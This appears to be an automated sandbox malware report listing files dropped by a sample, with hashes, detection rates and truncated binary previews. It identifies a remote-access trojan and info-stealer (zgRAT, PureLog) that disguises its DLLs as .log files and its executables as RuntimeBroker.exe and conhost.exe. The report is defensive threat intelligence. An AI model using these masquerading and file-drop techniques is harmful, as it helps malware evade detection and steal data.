                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\zJz3GZ0Bww

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\zhGBOEYzHb

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\Desktop\CjKcCUFn.log

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):23552
                                                                                                            Entropy (8bit):5.519109060441589
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                            MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                            SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                            SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                            SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                                                            Joe Sandbox View:
                                                                                                            • Filename: QMT2731i8k.exe, Detection: malicious, Browse
                                                                                                            • Filename: EQdhBjQw4G.exe, Detection: malicious, Browse
                                                                                                            • Filename: 3AAyq819Vy.exe, Detection: malicious, Browse
                                                                                                            • Filename: TGh6AUbQkh.exe, Detection: malicious, Browse
                                                                                                            • Filename: k1iZHyRK6K.exe, Detection: malicious, Browse
                                                                                                            • Filename: VfKk5EmvwW.exe, Detection: malicious, Browse
                                                                                                            • Filename: cGZV10VyWC.exe, Detection: malicious, Browse
                                                                                                            • Filename: PbfYaIvR5B.exe, Detection: malicious, Browse
                                                                                                            • Filename: 9D7RwuJrth.exe, Detection: malicious, Browse
                                                                                                            • Filename: qZoQEFZUnv.exe, Detection: malicious, Browse
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                            C:\Users\user\Desktop\SlQgWXuB.log

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):33792
                                                                                                            Entropy (8bit):5.541771649974822
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                            MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                            SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                            SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                            SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 38%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                            C:\Users\user\Desktop\UAuXMqPf.log

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):85504
                                                                                                            Entropy (8bit):5.8769270258874755
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                            MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                            SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                            SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                            SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                                            C:\Users\user\Desktop\WgRxdDkv.log

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):85504
                                                                                                            Entropy (8bit):5.8769270258874755
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                                                            MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                                                            SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                                                            SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                                                            SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 71%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                                                                            C:\Users\user\Desktop\XIsgiJJb.log

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):69632
                                                                                                            Entropy (8bit):5.932541123129161
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                            MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                            SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                            SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                            SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 50%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                                            C:\Users\user\Desktop\cZuWGjpj.log

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):22016
                                                                                                            Entropy (8bit):5.41854385721431
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                                            MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                                            SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                                            SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                                            SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                            C:\Users\user\Desktop\ece600a340c872

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:ASCII text, with very long lines (673), with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):673
                                                                                                            Entropy (8bit):5.883826806883822
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:70XXDrAs2fsEe3htd2n8JJm0nQVtxxUr8E1cgx3u2EndbokcjOh/sNoZGat/nk+g:UXDrJ2ivkn8bXgRndb5Rh/3rebqo6tg
                                                                                                            MD5:326BAB8ADC2594C92F1FE4E92F50B5A5
                                                                                                            SHA1:3FDB7079E9BEB9A7459E57B19E14B561E1CE29F0
                                                                                                            SHA-256:9D206F6F30A22385C4C8C922B65BFEAD58AD57EB00E1E2ACDF45DCB6B12B63AD
                                                                                                            SHA-512:1B5BF72DB343E751F0109703B1436D06A751AC19A17A9D32670A0D0AE8CFE6511FFFD3C6FC86C134EF9C8ED3BD6C5D5AE7708B4890B5D0C69CFABFE8EE56C121
                                                                                                            Malicious:false
                                                                                                            Preview:A2sgBiQVNycGVjx9i3QojcfgYeDVFV9hNC4Q74CISUeMhWGysGoR44GhWLIgf5P2y52TogCn0IWP8T8CYOm9qsmT6X4vwgnWEmXmdwKLDBawh0jCNGHQTQLGSjWRmR1Te9KV6WilEa5pR0vFx1iqYXDyaRU4a2iwJHRhqNG1hgM2UgybxRdvtK5H5W5pBoLL1JfKiNZkuqI2KLd3c2GJYxC9MKmTSbz3UAALBo2j13BCBC6u3BMIhCwEHf8YlGRS1PiKLS2xAhRev97JO1aQOqWSN5Efqe7umsLwevjkJYI9uRSHiyKtqADK2P7POWHfjg2DyKpcSzHziXh5m662TNEloA3OyTWwRmZNZPSXIsb13NmfsBnRZPMWcRZxRbn9cVi57UgXojtlwNsaYYgxqFWCaDvH0fGrEcYhpqiXfPn0fkjOj8Z340SX8ff3iYhJcChTzKurzISabfh0dgi1FNwOJAjJLozGseXcDPZZOrDwi16d8pZC0qDPQSKyllfLTLs7HEwNGJnYJ9qSEGKgOwQCbIMuFlxmL2dWJ8V42M5qCpFQm1tfa96g4pg91CIfVAMRgTIFuPoC1j9vC6IO1SMM66bdcVDzDaVCcytSsnuKU3pVqu7443nCyAVj1pnZMy8aO7TONzfNiB1CRGxsYI5KxSOccJaDA

                                                                                                            C:\Users\user\Desktop\kZSUvzow.log

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):23552
                                                                                                            Entropy (8bit):5.519109060441589
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                                                            MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                                                            SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                                                            SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                                                            SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 8%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                            C:\Users\user\Desktop\mjoVvRUx.log

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):33792
                                                                                                            Entropy (8bit):5.541771649974822
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                                                            MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                                                            SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                                                            SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                                                            SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 38%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                            C:\Users\user\Desktop\pkWDNnmN.log

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):32256
                                                                                                            Entropy (8bit):5.631194486392901
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                            MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                            SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                            SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                            SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 24%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                            C:\Users\user\Desktop\vEZKvYQi.log

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):32256
                                                                                                            Entropy (8bit):5.631194486392901
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                                                            MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                                                            SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                                                            SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                                                            SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 24%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                            C:\Users\user\Desktop\vNwKfKje.log

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):22016
                                                                                                            Entropy (8bit):5.41854385721431
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                                                            MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                                                            SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                                                            SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                                                            SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 4%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...)..d...........!.....N...........l... ........@.. ..............................R.....@..................................l..O.................................................................................... ............... ..H............text....M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................l......H........L..............lL..H....................................................................................................................................................................lsx)T.,.....h.)................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                                                            C:\Users\user\Desktop\vlWcZFKy.log

                                                                                                            Download File
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):69632
                                                                                                            Entropy (8bit):5.932541123129161
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                                                            MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                                                            SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                                                            SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                                                            SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 50%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                                                                            C:\Windows\ModemLogs\088424020bedd6

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):297
                                                                                                            Entropy (8bit):5.795993681281262
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:+6nGd30TXdLQ6NRgVN/ArzyxhjUIBtBHZI2f1Ho2dv3Bnqe2WoSpIE1n:c0Ttk6NRgVZSexCIBtB5I29Ho2ZB+amI
                                                                                                            MD5:39FFCE830DF28DF4A8C95F5ECB3845FC
                                                                                                            SHA1:DFAA05530D13A524A837522861C9B760F43B65BF
                                                                                                            SHA-256:CE8F886016915AE8DA93735FF2698A8193697A9A4FDDAFF784F901DA753ECE64
                                                                                                            SHA-512:EC974F57E6BEC8C2256A53A813AB9B5674AA3338C6D2009C116FB750A8A966440865676E4F0A053AFBBC73DE836CF38960A72A4C519BB6394416519BE371AD4F
                                                                                                            Malicious:false
                                                                                                            Preview:fcLq4IVwVbtMA9CrKuWegkp3I4R1czKwLMC8COtgnyYvXxWAcRuHHkv5xRiA1dUgR6Ay6Dp5A01sM4gVhRZLEDplbHLuqtpJe2dawiDYmyGRsCs3vMckDJbORYWy25OQLrOUaFj9NBjQ6X3YZS9eREGVaOJXLOgrj0GAyXcpncWCjKS3f8Zj5u9Gl33L6Ly8f1qGR2kB0T0ysEvP6P1Mz6vy09Z5dQtbnYgseMmnYXtm3KXhInPqTlJjG1PRdphjjYKUhDvtnOybMI5pl1w0ACICO7lm7UKt0JCeADAF2

                                                                                                            C:\Windows\ModemLogs\conhost.exe

                                                                                                            Download File
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1991680
                                                                                                            Entropy (8bit):7.552871211185118
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:qhNLIZG9ZdCvfOqBlRF7kVkHreh1kEGD/5MTgsxjY9gIBiatkZ2hIHirkUP7oM8j:qGfj7rk+CLN9EIshijMX6i5w
                                                                                                            MD5:B379F4AC167609D8A3EF26444098B61D
                                                                                                            SHA1:85FE0BBBE666D72A955EE98444415194E00739EB
                                                                                                            SHA-256:430CBA76BB21F0FF671A5345C15A51BD047B0F5AECF764EF4668AE9085D22B80
                                                                                                            SHA-512:0028141132F1437FF556A00E7CD32298BF561690FD809F361FCFAF9B8837E5A173F4ACB192B25668550E2EC526EA4A518EA46E3FD7C2E1B8FAD1A49D8D6ED0FE
                                                                                                            Malicious:true
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Windows\ModemLogs\conhost.exe, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Windows\ModemLogs\conhost.exe, Author: Joe Security
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 66%
